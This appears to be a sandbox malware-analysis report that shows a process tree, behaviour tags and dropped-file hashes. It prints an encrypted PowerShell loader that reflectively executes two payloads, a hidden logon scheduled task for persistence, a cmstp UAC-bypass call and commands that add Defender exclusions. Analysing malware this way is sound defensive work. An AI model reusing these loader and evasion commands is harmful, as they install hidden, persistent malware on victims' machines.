M x U h c T r t y M 4 N 8 U T i c H P 0 v K 2 / d o E p 9 r o K F T n G 2 J p L H z H n l + G / 7 g d W 5 W J t h t I D M n I 4 R E 7 b j y / e T 0 n E w x i C O k Y V p Z L q X J y W 0 W A s u g y c L v W K A Y 7 5 u E K 6 n B H M N 5 o A c 3 b X G s E Z D F A E H / G i O s 5 a c g C Z o O Y M e q I G R N L z s 0 z q H T p c J z s d M E P b 9 e x x v v P F n X D G g 3 G L e i W U d p I 6 a + P l 4 s 5 k n F q P E i 6 b 9 3 F r M W I t D B O p N v 6 A y h i x A m q T b d + 1 n j / G l 9 c E a B H I P H W S Y L I X E F v V c S 5 Z s x l m U z c Y G O R z B 6 T k 2 F X M v N j v 7 P 2 E x K 8 3 W e 1 P Z 2 k P v V f Y + 6 z f a D b r 9 K v V n t G 9 X G F v P 9 V M 3 f 5 Z e Z F M k F w t c 6 n U M T h H a P J q f E k 9 u u p + f H S C 2 8 e G k 5 4 K D m U Q q V q D G 1 I + 6 l T k C e c G M K u V 1 J e R R 1 w g G Y R j F o z R o e y r X j q c + 3 T N V C g u / 2 O 3 m 9 l 8 r F 2 o e R d I V 9 H u 6 D y 0 z c p B e C n 3 j R h D z 4 W m R 9 5 M D F 9 D y a v L f v 9 G a C A 8 H R k K H x F r r u o B q H p U v L e F 9 N 6 b g T I 8 t L T Y b 7 h O o 2 a x F P 3 P S N p W U x / I K I x j q j h v e 0 h x U I e y / 5 V 4 / E A L q y x I G e + 0 2 7 / H 1 m 9 i W 7 h 9 S H 2 + o s b w O v y a G S q P I I B 3 1 5 H U n 3 k M B P g I H h 9 G 3 F O / X J O g I e X X 9 S t g o H b k h 6 F T Z c y S W 4 Y w L 7 W c I U z h P 3 N w o E W U G r + t f j p R + N B f F V 6 D 2 2 U g B 5 0 2 S B o 9 c M L Q / q / E M S R h f c N 7 B q K y m k Y e S P Q R r t 4 T 1 W s 3 u o O n t w b 0 6 c s 8 3 P Y 4 7 P 0 x K P t e N c 2 w 4 Z x c l 8 o d H V 4 1 8 j W O w b z c w S N B x K R S P Z 5 I U c V R M b 0 L g W Q R J g 7 u d 7 b k S 9 7 K T W P O / Y 7 B o K U q P 6 U L q R e B 4 X + 5 / 9 u f h I r y a g y z 6 J D x C n P 1 Y F k u N j R o 0 v z U W h z p r u w v W 4 2 2 j L u o 8 B U O s k Q B y E u m o j Z V 2 2 V C r p h m v Z H e v 1 E 6 2 z Z + u C V H s T O E O T W 7 B x e 1 N / N E Q K G N l e E r p 9 u + J Z p w u 7 0 J Q 2 r J 4 P v K I h H T m 1 O x J N y 3 6 G E q j y e E J 9 Y u S 8 0 t o w C U M Z c c A e h 1 Z T i 7 u k p j e L s W 5 4 o F l 3 4 H 2 K D M D F 0 t N m g R N l b x B H U 0 6 4 8 m 6 X t 7 t 8 v 6 z h y E R 9 I R j Y n p r u S 7 E r s / I b f 2 e g j G 0 Z + m b U Y c I 6 y x e o Q 7 G P w V M B 2 0 / Q 4 N l f k j C D X g L p 0 D K l 2 O + m f f s f L C G R m x L 0 i g d F A a X e Z n B S G x q U K / D V R w 7 p 0 e h 4 g F C R 8 p O y i R y P 3 S M B j N f Y m d v A S U i 1 0 z 1 Z v 4 4 N j L m 3 d M d f 5 5 A u a 2 a 1 O Z c H b 9 G o P b f f W z 3 J u 5 g E T H n T q L o o T T l L A 4 X d u h W I U y l Z i G B j S t p R v O 3 b / N L r G 6 + 6 M H W u A T u J d G T j 3 / f 0 u D 1 c U k a t l s L q a n k J y d u 2 U Z E F M W 1 u G Q u E N E K X x O F / e A s / F c V T V D E W 9 a v S y 2 s p n x U X 7 I 8 a V x F j u j f F Y k n v c W M X S 4 I C W n j j t n m h j l 8 d f j p v 6 q K Y 3 L / L o B T 5 e f z i g d + i t Z i e l u r d D r y R g e L d j 3 w z N z V 7 C c g h F 3 1 p h D H W b 4 F D V X W j o f U L d D t M z p / Y h K h W P q v A 9 E z f g c m n U e j 7 / + 8 q 6 8 9 i u I f X y L 0 s 2 K 9 m v W Q V j E C i M z / O + F X / j o F D f l t y v l 0 i I z m g 1 U 9 O J s u S y j u j s c 6 e X K 9 i T h H s J 3 k N Y 3 V Q C L K 6 A 5 O i M 8 E b C o j Z y c X G R P M s g T 4 z C r k G + p n V O 6 0 k c E j C 7 r V z S d N R b + a J 7 p 1 A g + P Z Z g 6 X + 1 T m 3 A b X z e E f i L 4 B q n c Y F B g p A L V l s 4 B H v v n k Q A E h 6 t k O w F c g F H B K J 0 S u w Q d B 2 n D 0 W n I + I j I 3 A S v h y O k o + c B 1 k H 0 e t 4 f J d d K 6 1 z a p v G n X A g z l C D T l k F s Z Y I J Z l 2 M u k I S B + p Y f x W w t / V D Y K r M W S / L K m p w D e 0 + M O 1 1 M W / Y N g O y F F T L P r w x N B 3 i F b O a 0 j o 9 n p v v 7 O L Y S W I r 1 n i H y 0 F C 3 y j p h b r 8 j r a K d B x g o E D 2 O s Z S D G s k c f y H N P O O 5 c 1 7 d 0 g 8 F F X Y s Q 5 d Z h M A 9 4 K W 8 8 C C Y g A 9 I J e n O 3 L H N X K D K b 3 e L R u g C 0 L 4 x y 9 L F J T 2 / X w S p 5 M 9 e e m 7 q F 7 o R c m K c k j C I B o h w A l s v u M W 7 P K 2 T y 0 B P U 3 o H m i t o l 3 6 1 b Q F b Y k N G C R F 4 q S u T a + q 1 1 f c x 0 d H A P 4 e R J y U k 5 s a g P j O T q q v n P A o k q 2 Z U O m + v 5 e x j l u g m R P 8 x D W 9 r I 2 V k + Y 6 R A + T T W n F S K G n g g B E Z u y b f A B n Z G B 8 H r U a q u Y / n B D G 2 c Y r / R / D u Z A i n T t M D E m / N C 3 O 9 D / j R P p O r 4 / 0 r t F o n 6 q U K Y W h w x L / Z 7 e 9 k r b p U b y O t Q i i P X 3 b f t U d z 3 s W B O c Z I h Q 5 k j W g k 0 8 u M R a P Q 5 h h M 6 g q 3 M n Q G c W M T Y S X j C g o d 2 V r D D F C e c I n B v t d W s q R E U + Y 1 0 x L 8 r i j j T A i y O y j 8 A w 4 f I q + j e J k 1 0 v f x o 2 m j 8 Z 3 b T I v y L 0 L 2 Q 0 W z Z X k 9 i w G f L T r K 0 J H F P v D s L 6 b E r N k 5 8 8 o t 5 E 2 H t O r a 6 0 B W 7 3 9 3 / Z k v p B r k 4 q 0 u X b 7 U 2 1 1 H E X L N O X 3 e l o r k 9 X E n A X V J S 6 k j l W 2 n 7 6 W m C K x + d V L F Q U N R v X + M G K S p 3 7 G B q 4 4 N i r L 2 H o i q O + F l U u h w z 1 3 F j L 6 p w k V c i 8 s B P V b J 7 X t L 8 e D c N f g F F w N n 2 r N p C 6 V H l p M h v O c f t I X F M p w D 9 J n Q 2 n m f 4 + 0 a c + K 0 M / N L 0 N p k U / Q / u Z Q 5 l Q N d s + h U t B L I W b / g W 9 b g e P J F j a p S Z e r L y D 7 G x 7 C I d C D G k M f S h h P r n 1 i l O x J S D 6 W O x Z J 6 y g O d 8 Q 9 U m X n b R 2 + G / C d W x V G W a 1 j c t N I X 8 O Q N s o P n u R t U 3 i H K 5 e 6 P T X / u p + x X v F p 3 I U 4 d B n Q r U g i 9 i k n e J a 7 a o p P F 6 X x W B 0 G F L p X d H a 7 a b O W 4 b s w 8 P X x y k o z E M m n t R N y s H b n j Z p p 1 F r V y b Z h g P c t 5 d i b 4 A h 4 j n n D 0 h o b k i 6 7 j 3 S k G Y D 9 d M J L 7 8 R j / M e a 0 t e H A 4 r s 3 Z 3 s / u + N K K r V 7 A A c x 5 X H D U Z S / Q y 6 K V r r l f L r p y a M 1 B M Q o 2 D 5 H I H s 4 3 6 e 6 Q a i 1 4 5 W J A 8 x L l W k E L G / 4 F t H Y J W r d Y v 6 7 I 4 4 L 9 d S 8 s 6 x r G X 6 M N v S q N 6 O F H Q B w P 4 k j 2 S e i R b Y i P h 9 g R b z i z V q Y Z c J q 3 V h z F h y y 6 6 Q n C B Q o f M A Q C j R M N c b v 6 d T P D J v j k p 1 g U 8 6 G l V U 5 T u 6 N N l 8 z G w T b i e H M I / R W e Z M h k i m n F N o o B B P 6 a y B K y v g C M d d M R I S w i G A U F y O 8 e A C p X i C 4 d Z E 3 d X 7 P a S q d u 3 3 U + H 4 8 K K E l Y N J A 1 8 e E h E 6 e h c x J y K 4 l J 9 3 R A b f O g V I w j X M v J v g e b b z 0 W P F k v y 7 v o 8 w l R s U W 4 1 V O q 6 s h G t P 2 R O l g 7 3 R 9 N D V 9 W t m + n P g o b r z j 2 G I O G k e T a f R l U F a + 3 o 5 A 8 K 1 L + a n 0 r A K A M j G l H j E s F s D J k F D s 7 a A D l C X l K 2 I Z O H K a d o B 3 o S D 6 B R l Y f q 3 L R / 4 a 8 C 4 a D U Y N 0 S l v q e d w k z m 1 C 4 z l o Z I j R 6 t g I S V y Y m + t y E C Q I M X e b H R G a V N x K / x 7 5 k D 9 S o H u S / V H K C J Y b d F 1 5 z e l I x d U z b o r m 8 5 3 R 0 Q A L d b 7 6 / r 1 o E x y J E B h W 8 2 D p O i 9 q / c q d n / d u D n j T 6 C s W 7 u X R b W H Z o x D s a 4 o A C H K s k W h 2 f a u R H g M U l R 5 W s / / s 2 Q R B i 7 K v w a E F R L 5 Q n s K T d D a q 7 v f v T R 0 J M 7 2 5 t v e W P A D D h I A V 5 + A z r y D l 5 W z L N y x c F N r A L 8 t A H Z R 7 S + x s z j I M Q a S t J 2 v O L 8 0 X 0 5 i 8 n N W X r / Q u 4 u 3 7 z L Q n a 9 L B e O 0 H J m g I x v k H 6 6 R X 5 B L L e q 3 Y E a Y p X U + V B 2 W K J O E P M 9 b U Z 3 O v 1 d f C a l 7 d m 0 J w P c V X 3 b G E N W r V S r U Q O R A y 0 X d 2 W H H / e H Z 1 r M G f Y Q a + y c w T 5 2 R 2 g U 7 6 p M 4 n U 0 7 K F c 6 h N x 0 V b L 8 F 1 M V l x l D a O i / e e L Y 3 8 S 8 d + k u 2 J Y C / 9 M M M o U K p M 1 I F C h M s P r 9 I b P V D M K 5 B A 0 / H v 7 d G p 8 P l q B X 9 o R j M p O X D F D K 9 + o y i 7 N 1 W e J X M Y Z w R c F x m S Z F h u E o F y x K q I 3 h f + 8 d Y 0 K Z A q C q / j J Y C W M S j G Z Q I h J r 9 r a D E i L t l r T h W 0 o a 2 q A m / s x q l s o C i j e A 2 x S N k d j D t O D 9 2 4 n M B N 4 M P U W 0 J V / y k a z s F m t e j A A 3 Z l B k O 4 t N p J D k h p 0 0 u E D 1 C / V s g a 9 q j K P U d N l y y j A B N X P W t 2 O R g 5 Z M T T M 6 M S m 2 O V b N / Z y T N a o c F Z X C Q h 5 y Z z q n x K O v u e g M f l Z t Z 0 n C V N L Q a h q k C 7 S p k 7 Z v o i m K H d T t y v P l d X + U K 2 1 q 8 b l I b 6 O e b o J 1 k P 1 h E M Z D 5 9 b e s H 3 y b T E i n 9 q 6 1 O V 4 1 / x d M 9 Q k d a 2 f n e B c B D 5 A 1 s V h v M K t Y N n h G j q u o n F Q q x p R q R g 2 a H X M R y w o 3 1 M s l Z Z R H A v 0 D r c w d D r f 8 C 6 X D H 1 P w Z U S G 7 I 2 S r q A k S E O J O e I T e 4 X J 9 p g Q q C t x C 2 d e D j u I Z 9 1 Q d m d h 3 + V J 3 y + U 2 u I 8 K O 8 0 X K 2 Q X x k m H H o F u k 4 3 o t S H G J X C 5 Z g Z v r 9 y c + b E j V O w W G J G R C b i o E l 3 w z 8 b S 8 B L k v G i 5 g G f m L 9 l w z R I L W Y O m 5 u G W t 6 I z + g w 1 + R P e 6 I m x U d w g B g T h K d N 2 Y F L R a k r P 7 t D c 5 5 S l E y d V 0 o Z A P X 1 t m p v y B 6 4 w O n 7 0 J E 4 b I A n 3 N n X g U W B Z R K c 6 l r p x Y L 2 7 y i o F / O f 1 H H P t y r V B 4 / r f u / R 3 R 2 r f D / T M o + F w X h X S G j y L n 7 + q W t Z g C I x Q H Y o b e R C r C A U g x q f I e z O H I 8 a x J s R m t J + f 2 2 q 1 O b j o V l C o O 7 H f K M v p i 0 Z C o s d 5 m X + u h l F f C J S / d V y N 8 k K + F 1 p 2 s G p B 3 Z k B b t l X 7 n y I g B Z X 6 D F r f L Q 8 S 5 8 M g Z k Z S 4 b 0 1 8 E 4 g 9 C y r C U o b 3 a u B L o A y v 4 t D Y O k 8 g k K z U f 4 t u m E q r p Y x 4 l O b u z u 2 D A 8 A o / p C W + 6 Q Z a h b n S C b 4 a 0 W U n b I M U e J d J I x 5 W 8 t + M T t H u u H i R k 8 b o C A O m 5 v W k N u l x q / / d T f R P g F E U P x 5 F h z J M s u c b a L 5 + T t d l N q X d + W 2 l d P 1 5 o + 8 e 4 9 O u 0 K 9 m G Z t W a 7 H 0 q x D l 2 d C d O 8 E A S M H K D A U g 7 9 G M m 3 + c W + v N Q z B C w 4 0 4 Z P 6 y 7 6 c G l 4 k N r G y i k P 7 a " )  
         $ i   =   $ d [ 0 . . 1 5 ]  
         $ e   =   $ d [ 1 6 . . ( $ d . L e n g t h   -   1 ) ]  
         $ a e s   =   N e w - O b j e c t   S y s t e m . S e c u r i t y . C r y p t o g r a p h y . A e s M a n a g e d  
         $ a e s . M o d e   =   [ S y s t e m . S e c u r i t y . C r y p t o g r a p h y . C i p h e r M o d e ] : : C B C  
         $ a e s . K e y   =   $ a  
         $ a e s . I V   =   $ i  
         $ d e c   =   $ a e s . C r e a t e D e c r y p t o r ( )  
         $ o u t   =   $ d e c . T r a n s f o r m F i n a l B l o c k ( $ e ,   0 ,   $ e . L e n g t h )  
         $ r e s   =   [ T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( $ o u t )  
         I n v o k e - E x p r e s s i o n   $ r e s  
  -inputFormat xml -outputFormat text4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5320 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pyrphdsg\pyrphdsg.cmdline"5⤵PID:5512
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFEB3.tmp" "c:\Users\Admin\AppData\Local\Temp\pyrphdsg\CSC59BD8EB9C90E4BC8984DA165F31229A8.TMP"6⤵PID:5552
-
-
-
C:\windows\system32\cmstp.exe"C:\windows\system32\cmstp.exe" /au C:\windows\temp\3l1zov0y.inf5⤵PID:5604
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "3⤵PID:5312
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVzb+ZnULdRKJ8Pt1u0INEzxzJ9SAW0T4lv8svV35z4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1TJD7feNK15qiqdG0L0ERw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FnHYa=New-Object System.IO.MemoryStream(,$param_var); $tuGjJ=New-Object System.IO.MemoryStream; $ZPygJ=New-Object System.IO.Compression.GZipStream($FnHYa, [IO.Compression.CompressionMode]::Decompress); $ZPygJ.CopyTo($tuGjJ); $ZPygJ.Dispose(); $FnHYa.Dispose(); $tuGjJ.Dispose(); $tuGjJ.ToArray();}function execute_function($param_var,$param2_var){ $PWDPu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rNYVG=$PWDPu.EntryPoint; $rNYVG.Invoke($null, $param2_var);}$mhqzu = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $mhqzu;$nhfYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($mhqzu).Split([Environment]::NewLine);foreach ($JOXWc in $nhfYw) { if ($JOXWc.StartsWith('gVggYAWWcClzlgdUqYRt')) { $eTtfZ=$JOXWc.Substring(20); break; }}$payloads_var=[string[]]$eTtfZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "4⤵PID:5832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5824 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_644_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_644.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_644.vbs"5⤵
- Checks computer location settings
PID:5444 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_644.bat" "6⤵PID:5132
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVzb+ZnULdRKJ8Pt1u0INEzxzJ9SAW0T4lv8svV35z4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1TJD7feNK15qiqdG0L0ERw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FnHYa=New-Object System.IO.MemoryStream(,$param_var); $tuGjJ=New-Object System.IO.MemoryStream; $ZPygJ=New-Object System.IO.Compression.GZipStream($FnHYa, [IO.Compression.CompressionMode]::Decompress); $ZPygJ.CopyTo($tuGjJ); $ZPygJ.Dispose(); $FnHYa.Dispose(); $tuGjJ.Dispose(); $tuGjJ.ToArray();}function execute_function($param_var,$param2_var){ $PWDPu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rNYVG=$PWDPu.EntryPoint; $rNYVG.Invoke($null, $param2_var);}$mhqzu = 'C:\Users\Admin\AppData\Roaming\Windows_Log_644.bat';$host.UI.RawUI.WindowTitle = $mhqzu;$nhfYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($mhqzu).Split([Environment]::NewLine);foreach ($JOXWc in $nhfYw) { if ($JOXWc.StartsWith('gVggYAWWcClzlgdUqYRt')) { $eTtfZ=$JOXWc.Substring(20); break; }}$payloads_var=[string[]]$eTtfZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵PID:2912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:244
-
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:12⤵PID:5776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:12⤵PID:5784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:12⤵PID:6100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:12⤵PID:6108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6388 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1328
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:320
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2044
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5712
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath 'C:\'; .('Add-MpP' + 'reference') -ExclusionProcess 'powershell.exe'1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5936
-
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5164
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
152B
MD5bffcefacce25cd03f3d5c9446ddb903d
SHA18923f84aa86db316d2f5c122fe3874bbe26f3bab
SHA25623e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405
SHA512761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7
-
Filesize
152B
MD5d22073dea53e79d9b824f27ac5e9813e
SHA16d8a7281241248431a1571e6ddc55798b01fa961
SHA25686713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6
SHA51297152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize456B
MD5149832d3c7cc43be68fd8d312c94b3f1
SHA11f5ed44bb6c09ec59cd9f9bc39eda394f3b0ad67
SHA2569bba190d1b2904003b47d341d8561e43d8f5ad5f3db0835cd4fa194ab0e13b48
SHA51206416a216d41a7ccf3669ef19abc642c986d012349104102cf63e72d72703e789ab2c6c4f0480c854b131a5e6589ceb5d571053ab794779fa64c2ef1677173ce
-
Filesize
3KB
MD50b6eb138f93886cc3fd28fcc0dfb9187
SHA1d7f7c702d20ab5e44f91d00f43e91a50715e2dbc
SHA256e6b70272f1f19a18f236e7d82eb8864c032badd000c05b62038bc98f1eaa5d19
SHA512138cde80a4c2913bcc308368cd00d0f7c857c4ee07a975bf6f6112043df23eb4a562f1cae2f878bd50765fe76bb6c0b7ea023bc8b39bb4f2e620dba6774cdaa8
-
Filesize
3KB
MD5ce15ca6dd5010e6e025fd047ff1e600c
SHA1a25fe699eb22897b44872fcaa3afa03761e910b3
SHA256e0445aa30b9f5dc87b5773dfd998640a20f935b3dd38a73ddb0692746620e3fe
SHA512602ee387761f78058bc55871f51f079ab5e4bcbafa5e306877ec2df0d0e34f57e8c079efa19ecb1a3b4d3c3e09ae59d05acfc9c06508c992a109743bc7d870f0
-
Filesize
3KB
MD5375cdb4f22b98cd1d6411ca5ed2b0364
SHA1fdeaefac148d47530875f65625457e4acce36524
SHA256e2670a4c8d6d742f4a3cb136f0d821410e7951733eadce3e92b3847e3d02f63d
SHA51222f0b28ef46eb4863ae55cbba15af0f8f1676c78141fd79ea14fcda7e9671a064f40558265e784c5b29aad30b9413ebbe2d103794321d2efc72095f1a0e38b1d
-
Filesize
5KB
MD5e20320e37f4ddf177f0829b5bf8aae50
SHA13d1dbb0dbe87630f2a0f6116f2ee99e835018e85
SHA25601e6df56f773480894cf5622c25a704724b060ed5a50d4b34492ab684614e33f
SHA512531a336596730f27e5e31b175e9e5ae63458d05fcc381558d123b5dc40a1574b0e74192d4b2b8c07f1aafbcb72663c59c41f9488e516a6842af4b0cb0bbd5bca
-
Filesize
6KB
MD57c8c1e7d0c2d281bbcd73e0dda611ae8
SHA1acf7a855fb867b9c9abf779e4f06c01c2109c0b1
SHA256e67383482d7b427ee64cb8b968c839c2274fedc82f98b88164bf9d85ccfa23d1
SHA512713c981ba42143a348dd5dac768b48ffbf1fec915c016a09ec0a4e3f34aad66eeff33af21596b276c271c1cf3b2d2b6377c610223340ab5d910bbcc766d5e689
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD503c04c38639a8da564dc39bd0be4f087
SHA1d2bee6820bc6a08c9f86a656eea3e7f68bd80b76
SHA25663106251167bce083ee2e8a4af0c8925622d2bb370544528dec2cffc944ed0c9
SHA5125e31459cf8342844961e6d847144cbae1d7b9ecbdd5e4a09bedadcf9dafe4829131d009cfef746f5142fdf2ee63843eb099e8733f1f0af10e4a7c540d1cb06b0
-
Filesize
10KB
MD5d52d5c48f0f689fad6feab7291d86674
SHA1a65005be0077c7214d5c221905fc85d3a910660b
SHA25646ea864fa28a3f3fecda2fc3da3f4b413bd678850a5e5054cbe52292aa80ae8a
